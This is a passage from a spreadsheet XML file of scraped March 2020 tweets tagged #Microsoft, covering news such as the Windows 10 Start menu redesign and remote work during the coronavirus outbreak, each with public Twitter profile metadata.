#coronavirus #covid19 #covid19 #microsoft</t>
  </si>
  <si>
    <t>{'id': 985182954925314049, 'id_str': '985182954925314049', 'name': 'SiRON Technologies Group Inc.', 'screen_name': 'ManagedbySiRON', 'location': 'Mississauga, Ontario', 'description': 'We design and deliver solutions that are built on technology from  industry leaders.  We are known for our competence, professionalism and  experience.', 'url': 'https://t.co/q0AITMcOfE', 'entities': {'url': {'urls': [{'url': 'https://t.co/q0AITMcOfE', 'expanded_url': 'http://www.siron.ca', 'display_url': 'siron.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 237, 'listed_count': 4, 'created_at': 'Sat Apr 14 15:48:15 +0000 2018', 'favourites_count': 124, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3929,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'http://pbs.twimg.com/profile_images/987466224056467457/zBjYMNJo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/987466224056467457/zBjYMNJo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/985182954925314049/1580248823', 'profile_link_color': '662D91',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</si>
  <si>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16:29:10 +0000 2020</t>
  </si>
  <si>
    <t>Operators Face Unproven Edge Computing Business Models https://t.co/KdNoXmu954 #5g #ai #amazonwebservices(aws) #breakingnews #cloud #edgecomputing #google #microsoft #nokianetworks</t>
  </si>
  <si>
    <t>Wed Mar 04 16:26:21 +0000 2020</t>
  </si>
  <si>
    <t>Are you looking for #Laptop service in #Dubai? At @danatcare we provide #repair #services for every single #brand.
Visit: https://t.co/3cOAWwRbM4
#Apple #Dell #Microsoft #Lenovo #MacBook #repairs #Servicetweet #Services4Sale #tech #techno #technology #technologies #technologies https://t.co/O4gfzOAVkC</t>
  </si>
  <si>
    <t>{'id': 796701139320315904, 'id_str': '796701139320315904', 'name': 'Danat Care', 'screen_name': 'danatcare', 'location': 'Dubai, United Arab Emirates', 'description': "World's No.1 electronic gadget sales and service center in Dubai, UAE, offering sales &amp; services at affordable rates. Call: 600566228 (toll free) now!", 'url': 'https://t.co/cZp0sfeAMr', 'entities': {'url': {'urls': [{'url': 'https://t.co/cZp0sfeAMr', 'expanded_url': 'http://www.danatcare.com/', 'display_url': 'danatcare.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 270, 'listed_count': 0, 'created_at': 'Thu Nov 10 13:08:48 +0000 2016', 'favourites_count': 644, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 606,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'http://pbs.twimg.com/profile_images/810874044711075840/b8Ap6XxQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/810874044711075840/b8Ap6XxQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/796701139320315904/1482162734',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</si>
  <si>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16:25:24 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Reveals a New Design for the Windows 10 Start Menu
https://t.co/EYFQ65RogU
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #Windows10</t>
  </si>
  <si>
    <t>Wed Mar 04 16:25:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Reveals a New Design for the Windows 10 Start Menu
https://t.co/A0iWbLJywf
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #Windows10</t>
  </si>
  <si>
    <t>Wed Mar 04 16:25:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft partners don't anticipate problems with migration from #WindowsServer2008, as long as the planning process is thorough and considers the clients' goals. @rorymccaw @GreenHouseData https://t.co/ZOpdHNvPEf</t>
  </si>
  <si>
    <t>{'id': 19309084, 'id_str': '19309084', 'name': 'SearchITChannel.com', 'screen_name': 'ITChannelTT', 'location': 'Newton, MA', 'description': 'An in-depth business and technology resource for managed service providers and other emerging channel partners. Focusing on features and news analysis.', 'url': 'https://t.co/l6lAQ3KP8j', 'entities': {'url': {'urls': [{'url': 'https://t.co/l6lAQ3KP8j', 'expanded_url': 'https://searchitchannel.techtarget.com', 'display_url': 'searchitchannel.techtarget.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5515, 'friends_count': 2882, 'listed_count': 491, 'created_at': 'Wed Jan 21 21:27:12 +0000 2009', 'favourites_count': 2325, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 22045, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CCCCCC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/941346735372341249/Prx_nIRa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/941346735372341249/Prx_nIRa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19309084/1513269552', 'profile_link_color': '00B3AD',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</si>
  <si>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Wed Mar 04 16:22:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and the NFL have renewed and expanded their partnership, making #MicrosoftTeams the leagues official communication platform. https://t.co/j9m9CcexJD</t>
  </si>
  <si>
    <t>{'id': 887096481689227264, 'id_str': '887096481689227264', 'name': 'Roberto Osorno', 'screen_name': 'RobertoOsorno3', 'location': '', 'description': 'Perennial student, father, avid gamer and tech enthusiast.  ðŸŽ§ ðŸŽ® ðŸ’»', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 416, 'friends_count': 1459, 'listed_count': 0, 'created_at': 'Mon Jul 17 23:47:37 +0000 2017', 'favourites_count': 348, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1990, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/989655146345873408/vbTgKUYK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/989655146345873408/vbTgKUYK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/887096481689227264/1556928525',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</si>
  <si>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16:22:32 +0000 2020</t>
  </si>
  <si>
    <t>Here's our very own Tom Henson in the latest @BizInnovateMag talking about how Microsoft's Modern Workplace can transform business operations and improve staff productivity, collaboration and engagement.
#Microsoft #modernworkplace
https://t.co/44vxvAREZY</t>
  </si>
  <si>
    <t>{'id': 308426347, 'id_str': '308426347', 'name': 'First Solution', 'screen_name': 'FirstSolutionGB', 'location': 'Cheltenham, England', 'description': 'Flexible outsourced technology solutions to businesses across the UK - working together using technology to differentiate &amp; innovate within your business.', 'url': 'https://t.co/5EfGr6uw6H', 'entities': {'url': {'urls': [{'url': 'https://t.co/5EfGr6uw6H', 'expanded_url': 'http://www.firstsolution.co.uk', 'display_url': 'firstsolution.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 560, 'friends_count': 1050, 'listed_count': 23, 'created_at': 'Tue May 31 11:48:53 +0000 2011', 'favourites_count': 212, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1239, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C5EC8F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222189975179071489/wz63ucaJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222189975179071489/wz63ucaJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/308426347/1547818432', 'profile_link_color': 'C1E40C', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F1FCAD', 'profile_text_color': 'E3F44E', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 16:22:10 +0000 2020</t>
  </si>
  <si>
    <t>Why is the guy in front of me reading a 'Windows knowledge'-website with his Apple computer? 
#computer #apple #microsoft</t>
  </si>
  <si>
    <t>{'id': 1172445520641441792, 'id_str': '1172445520641441792', 'name': 'Trekkie47', 'screen_name': 'Trekkie_47_1701', 'location': '', 'description': 'Full-time Trekkie, part-time Realist.\nshe/her ðŸŒˆðŸ––\nHufflepuff. Loves languages. Depressed Chemistry student.\n#mentalhealth #startrek\nalso @hsato47', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 273, 'listed_count': 3, 'created_at': 'Fri Sep 13 09:42:56 +0000 2019', 'favourites_count': 2612, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 988, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1191038381008072706/57A6zzDL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191038381008072706/57A6zzDL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1172445520641441792/1572426798',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</si>
  <si>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16:21:12 +0000 2020</t>
  </si>
  <si>
    <t>#CYBERMADNESS2020 is kicking off! Get ready to cast your votes! @MSFT365news #Microsoft #Security https://t.co/D9QH3d1C29</t>
  </si>
  <si>
    <t>{'id': 897669288, 'id_str': '897669288', 'name': 'EnablingTechnologies', 'screen_name': 'EnablingTechCo', 'location': 'Glen Arm, MD 21057', 'description': 'Enabling Technologies is the leading systems integrator of @Microsoft Unified Communications systems.  Enabling has 20 years of messaging and communications', 'url': 'http://t.co/nzkWku3kOA', 'entities': {'url': {'urls': [{'url': 'http://t.co/nzkWku3kOA', 'expanded_url': 'http://www.enablingtechcorp.com/', 'display_url': 'enablingtechcorp.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1277, 'friends_count': 1181, 'listed_count': 51, 'created_at': 'Mon Oct 22 14:13:00 +0000 2012', 'favourites_count': 70, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2219,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'http://pbs.twimg.com/profile_images/1088937907077959680/cslSvWaS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088937907077959680/cslSvWaS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/897669288/1551373108', 'profile_link_color': '0482FF',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</si>
  <si>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Wed Mar 04 16:21:10 +0000 2020</t>
  </si>
  <si>
    <t>Tonight joining @ManfredHelber explaining #azure #azurestackhci. Let's see how we can make it #hyperconverged on #Windowsservers 
#Microsoft #hci #Fujitsu #SSD #storagespacesdirect #sturmfreieBude #Hamburg https://t.co/KFKonoBrO6</t>
  </si>
  <si>
    <t>{'id': 2909000853, 'id_str': '2909000853', 'name': 'Martin Gudel', 'screen_name': 'AtholyMardies', 'location': 'Hamburg, Deutschland', 'description': 'ITPro, System Engineer, Technophile, #Office365UGHH, #trustintechhh, #tch, Microsoft 365 Evangelist, addicted to serverless solutions', 'url': 'https://t.co/CtUHXgyGsT', 'entities': {'url': {'urls': [{'url': 'https://t.co/CtUHXgyGsT', 'expanded_url': 'http://themigrationwizard.com', 'display_url': 'themigrationwizard.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 782, 'friends_count': 945, 'listed_count': 28, 'created_at': 'Sun Dec 07 10:03:27 +0000 2014', 'favourites_count': 25240, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12599,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'http://pbs.twimg.com/profile_images/876492232290955264/sMsEWjKq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876492232290955264/sMsEWjKq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2909000853/1498541943',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</si>
  <si>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16:20:09 +0000 2020</t>
  </si>
  <si>
    <t>Personalization is the next frontier in patient care. Read this #Microsoft blog to learn how #AI, #MachineLearning  and other transformative technologies can lead to improved patient experiences. https://t.co/oxEjEXipC4 #Healthcare</t>
  </si>
  <si>
    <t>{'id': 114384922, 'id_str': '114384922', 'name': 'WinWire Technologies', 'screen_name': 'WinWire', 'location': 'Santa Clara, CA, US', 'description': 'The go-to partner for Azure, AI/ML, App Modernization, Mobility, Security, Office 365 and UI/UX.', 'url': 'http://t.co/srV2VwxxIQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/srV2VwxxIQ', 'expanded_url': 'http://www.winwire.com', 'display_url': 'winwire.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 293, 'friends_count': 171, 'listed_count': 71, 'created_at': 'Mon Feb 15 06:47:31 +0000 2010', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1493,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'http://pbs.twimg.com/profile_images/1120253670182932480/CO6CvAOx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1120253670182932480/CO6CvAOx_normal.png',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</si>
  <si>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16:19:49 +0000 2020</t>
  </si>
  <si>
    <t>A #Microsoft revelou os jogos que chegarao ao #XboxGamePass em marco:
Xbox One:
-NBA 2K20 
-Train Sim World 2020 
-Ori and the Will of the Wisps
-Pikuniku 
PC:
-Ori and the Will of the Wisps
-Pikuniku
-Train Sim World 2020 
-LOTR: Adventure Card Game
-Mother Russia Bleeds https://t.co/QTlTUVqBvg</t>
  </si>
  <si>
    <t>{'id': 937674283916189696, 'id_str': '937674283916189696', 'name': 'Um Joystick na MÃ£o ðŸ•¹ï¸', 'screen_name': 'umjoysticknamao', 'location': 'Brasil', 'description': 'â–¶ï¸ NotÃ­cias, trailers e cobertura dos principais eventos do mundo dos games | ðŸ“§ Contato: umjoysticknamao@gmail.com', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 451, 'friends_count': 1045, 'listed_count': 4, 'created_at': 'Mon Dec 04 13:25:45 +0000 2017', 'favourites_count': 5890, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7685,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'http://pbs.twimg.com/profile_images/1145685165261426688/lDFsSxrc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145685165261426688/lDFsSxrc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/937674283916189696/1562026872', 'profile_link_color': '4169E1',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</si>
  <si>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16:18:51 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft Reveals a New Design for the Windows 10 Start Menu:" https://t.co/Y2QJhosecY
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 16:17:06 +0000 2020</t>
  </si>
  <si>
    <t>Feeling inspired after learning about the amazing work @MicrosoftUK are doing. @stevecla certainly knows how to tell a story! Thanks for a great day @Sitecore. #SitecoreEXP #Sitecore #Microsoft https://t.co/BOTmnmTc2l</t>
  </si>
  <si>
    <t>{'id': 20986666, 'id_str': '20986666', 'name': 'Mando', 'screen_name': 'mandoagency', 'location': 'London &amp; Liverpool, UK', 'description': 'Digital customer experience solutions for regulated industries. @microsoft @Sitecore &amp; @episerver partner.', 'url': 'https://t.co/3CivBwOBwe', 'entities': {'url': {'urls': [{'url': 'https://t.co/3CivBwOBwe', 'expanded_url': 'http://www.mando.agency', 'display_url': 'mando.agency', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3416, 'friends_count': 2614, 'listed_count': 787, 'created_at': 'Mon Feb 16 13:58:32 +0000 2009', 'favourites_count': 3535, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21034,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'http://pbs.twimg.com/profile_images/712263084627222528/qd5vbeLd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/712263084627222528/qd5vbeLd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20986666/1572606263', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F0B800', 'profile_text_color': '5C3808', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 16:16:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft allows employees to work from home amid coronavirus outbreak https://t.co/wwfbLrNC2B #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 16:14:48 +0000 2020</t>
  </si>
  <si>
    <t>#BREAKING- #Microsoft is allowing and encouraging its employees to work from home as the novel #coronavirus outbreak continues to spread in countries around the world! #Oigetit #fakenewsfilter #Coronavirusupdates #COVID19 https://t.co/G7N94t4WKi</t>
  </si>
  <si>
    <t>{'id': 3387837064, 'id_str': '3387837064', 'name': 'Oigetit Finance', 'screen_name': 'Oigetit_Finance', 'location': 'DC + Silicon Valley + LA', 'description': "World's First Fake News Filter. We use advanced AI to tell you if the article you're reading is Real News or Fake News. Download our app using the link below:", 'url': 'https://t.co/yufhDiHRv8', 'entities': {'url': {'urls': [{'url': 'https://t.co/yufhDiHRv8', 'expanded_url': 'http://oigetit.com', 'display_url': 'oigetit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 245, 'friends_count': 361, 'listed_count': 22, 'created_at': 'Wed Jul 22 18:51:01 +0000 2015', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 289,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'http://pbs.twimg.com/profile_images/1224817000720912384/IXLJ9Ja7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224817000720912384/IXLJ9Ja7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3387837064/1452542140',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</si>
  <si>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16:14:37 +0000 2020</t>
  </si>
  <si>
    <t>#BREAKING- #Microsoft is allowing and encouraging its employees to work from home as the novel #coronavirus outbreak continues to spread in countries around the world! #Oigetit #fakenewsfilter #Coronavirusupdates #COVID19 https://t.co/bpXLPFZniz</t>
  </si>
  <si>
    <t>{'id': 701081465858162688, 'id_str': '701081465858162688', 'name': 'Oigetit PR', 'screen_name': 'oigetit_pr', 'location': 'DC + Silicon Valley + LA', 'description': "World's First Fake News Filter. We use advanced AI to tell you if the article you're reading is Real News or Fake News. Download our app using the link below:", 'url': 'https://t.co/yufhDiHRv8', 'entities': {'url': {'urls': [{'url': 'https://t.co/yufhDiHRv8', 'expanded_url': 'http://oigetit.com', 'display_url': 'oigetit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 58, 'friends_count': 100, 'listed_count': 10, 'created_at': 'Sat Feb 20 16:30:21 +0000 2016', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 110, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224819127639920640/U4HiDz4d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224819127639920640/U4HiDz4d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/701081465858162688/1455987076',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</si>
  <si>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16:14:23 +0000 2020</t>
  </si>
  <si>
    <t>#BREAKING- #Microsoft is allowing and encouraging its employees to work from home as the novel #coronavirus outbreak continues to spread in countries around the world! #Oigetit #fakenewsfilter #Coronavirusupdates #COVID19 https://t.co/mM6k2RtEnS</t>
  </si>
  <si>
    <t>{'id': 3289077582, 'id_str': '3289077582', 'name': 'Oigetit Tech', 'screen_name': 'Oigetit_Tech', 'location': 'DC + Silicon Valley + LA', 'description': "World's First Fake News Filter. We use advanced AI to tell you if the article you're reading is Real News or Fake News. Download our app using the link below:", 'url': 'https://t.co/yufhDiHRv8', 'entities': {'url': {'urls': [{'url': 'https://t.co/yufhDiHRv8', 'expanded_url': 'http://oigetit.com', 'display_url': 'oigetit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 228, 'friends_count': 412, 'listed_count': 38, 'created_at': 'Thu Jul 23 20:15:51 +0000 2015', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 351,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'http://pbs.twimg.com/profile_images/1224818776157245440/u3XB_wIr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224818776157245440/u3XB_wIr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3289077582/1452545458',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</si>
  <si>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16:14:11 +0000 2020</t>
  </si>
  <si>
    <t>#BREAKING- #Microsoft is allowing and encouraging its employees to work from home as the novel #coronavirus outbreak continues to spread in countries around the world! #Oigetit #fakenewsfilter #Coronavirusupdates #COVID19 https://t.co/OvD27RL51W</t>
  </si>
  <si>
    <t>{'id': 3387939340, 'id_str': '3387939340', 'name': 'Oigetit Health', 'screen_name': 'Oigetit_Health', 'location': 'DC + Silicon Valley + LA', 'description': "World's First Fake News Filter. We use advanced AI to tell you if the article you're reading is Real News or Fake News. Download our app using the link below:", 'url': 'https://t.co/yufhDiHRv8', 'entities': {'url': {'urls': [{'url': 'https://t.co/yufhDiHRv8', 'expanded_url': 'http://oigetit.com', 'display_url': 'oigetit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 703, 'friends_count': 932, 'listed_count': 28, 'created_at': 'Wed Jul 22 19:53:48 +0000 2015', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 349,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'http://pbs.twimg.com/profile_images/1224816389245923328/02vNPZKj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224816389245923328/02vNPZKj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3387939340/1452538283',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</si>
  <si>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16:13:23 +0000 2020</t>
  </si>
  <si>
    <t>Round-up for recently released Dynamics 365 Customer Service features unveiled #microsoft #dynamics365: https://t.co/9MOypRuECh via @NeowinFeed</t>
  </si>
  <si>
    <t>Wed Mar 04 16:12:49 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft are giving away enterprise conferencing tools due to #coronavirus (via @TheVerge) 
https://t.co/nfZJOEb3oK</t>
  </si>
  <si>
    <t>{'id': 14344129, 'id_str': '14344129', 'name': 'Jack | Microsoft MVP', 'screen_name': 'jlee_consulting', 'location': 'The Big Smoke', 'description': '#Microsoft #MVP | #Azure Certified Consultant | #Entrepreneur | #Speaker | #Author | #CdnMVP | User Group Leader | #DevOps | #MartialArts #NBA #NHL #MLB', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1995, 'friends_count': 1463, 'listed_count': 94, 'created_at': 'Wed Apr 09 18:33:38 +0000 2008', 'favourites_count': 3748, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2748,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'http://pbs.twimg.com/profile_images/52970972/tkd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/52970972/tkd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14344129/1469339067', 'profile_link_color': '027407', 'profile_sidebar_border_color': 'E8E8E8', 'profile_sidebar_fill_color': 'E0E0E0', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 16:11:48 +0000 2020</t>
  </si>
  <si>
    <t>Why Your Multi-Company Business Should Ditch QuickBooks https://t.co/flmZMnpwKu
#Microsoft #Innovation #PowerPlatform #ERP #CRM #BetterTogether #CloudAccounting #BusinessSoftware #CFO #Operational #RealTime #Insights #Entrepreneurs #PowerBI #Dashboards #JustSayGo https://t.co/0WGoGerefY</t>
  </si>
  <si>
    <t>{'id': 278579294, 'id_str': '278579294', 'name': 'Valerie Silvani', 'screen_name': 'vsilvani', 'location': 'Detroit, MI', 'description': 'Making the impossible possible @GoGravityOnline full featured ðŸŒ¤ï¸ #cloud #accounting #ERP software built on #Dynamics365 - #RevRec #financials #MSDynCRM #SaaS', 'url': 'http://t.co/KCemzxhsI3', 'entities': {'url': {'urls': [{'url': 'http://t.co/KCemzxhsI3', 'expanded_url': 'http://www.go-gravity.com', 'display_url': 'go-gravity.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 573, 'friends_count': 819, 'listed_count': 157, 'created_at': 'Thu Apr 07 15:09:17 +0000 2011', 'favourites_count': 46, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4300,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'http://pbs.twimg.com/profile_images/1936887069/V_Silvani_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1936887069/V_Silvani_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/278579294/1544738653',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</si>
  <si>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16:11:32 +0000 2020</t>
  </si>
  <si>
    <t>Register for the webinar: https://t.co/IIQhtiWgex 
Microsoft MVP Christian Buckley will help project managers and task-driven stakeholders understand where tasks are managed end-to-end in Microsoft Office 365. 
#zen3 #microsoft #customerengagement #bigdata #microsoftoffice365 https://t.co/xHQHOHZSp6</t>
  </si>
  <si>
    <t>Wed Mar 04 16:10:47 +0000 2020</t>
  </si>
  <si>
    <t>Is Your Startup STILL a Startup? - Gravity Software https://t.co/1E7DmoVclD by @GoGravityOnline
#WednesdayMotivation #Microsoft #CloudERP #MsDynCRM #Consultants #CRM #MsPartner  #Resellers #franchises #FastFoodFranchise #BusinessOwner #CEO #OutsourcedCFOs #JustSayGo https://t.co/hAtSjbj5Yw</t>
  </si>
  <si>
    <t>Wed Mar 04 16:10:09 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft allows employees to work from home amid coronavirus outbreak https://t.co/tcj1FEMP49 https://t.co/7EHMiNRiwK</t>
  </si>
  <si>
    <t>Wed Mar 04 16:10:08 +0000 2020</t>
  </si>
  <si>
    <t>New Windows 10 Start menu: #Microsoft shows this new design that sidelines Live Tiles | ZDNet https://t.co/e4II2C1cBd</t>
  </si>
  <si>
    <t>Wed Mar 04 16:10:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft beefs up #Azure #BigData posture with #Hadoop distribution and large-scale #PostgreSQL option. @chriskanaracus https://t.co/TB4jZxB83u</t>
  </si>
  <si>
    <t>Wed Mar 04 16:08:28 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Get greater visibility into your apps with Citrix ADM: " https://t.co/UxRaeFnUxb
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Wed Mar 04 16:07:59 +0000 2020</t>
  </si>
  <si>
    <t>In his latest post, #Microsoft #Architect, Mark Arnold gives us An #Office #365 fable. One of a company spin-off and a mission: Get these 100 users off our Office 365, but they  need access to all those terabytes of project files and design drawings."  https://t.co/8tWlIsvyH2</t>
  </si>
  <si>
    <t>{'id': 15675423, 'id_str': '15675423', 'name': 'anexinet', 'screen_name': 'anexinet', 'location': 'Greater Philadelphia Region', 'description': 'Systems integrator &amp; technology management firm. 200 personalities strong and growing. Thought leaders who value integrity, humor and teamwork.', 'url': 'http://t.co/j9OOlMctzF', 'entities': {'url': {'urls': [{'url': 'http://t.co/j9OOlMctzF', 'expanded_url': 'http://anexinet.com', 'display_url': 'anexinet.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 690, 'friends_count': 478, 'listed_count': 28, 'created_at': 'Thu Jul 31 14:51:50 +0000 2008', 'favourites_count': 177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4596,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'http://pbs.twimg.com/profile_images/675036697919365121/lZ5bZlqn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/675036697919365121/lZ5bZlqn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15675423/1449777338',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</si>
  <si>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16:05:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #EY And #ConsenSys To Make The Public #Ethereum Blockchain Safe For Enterprises via 
@forbes https://t.co/kbwYUB2riw #Blockchain</t>
  </si>
  <si>
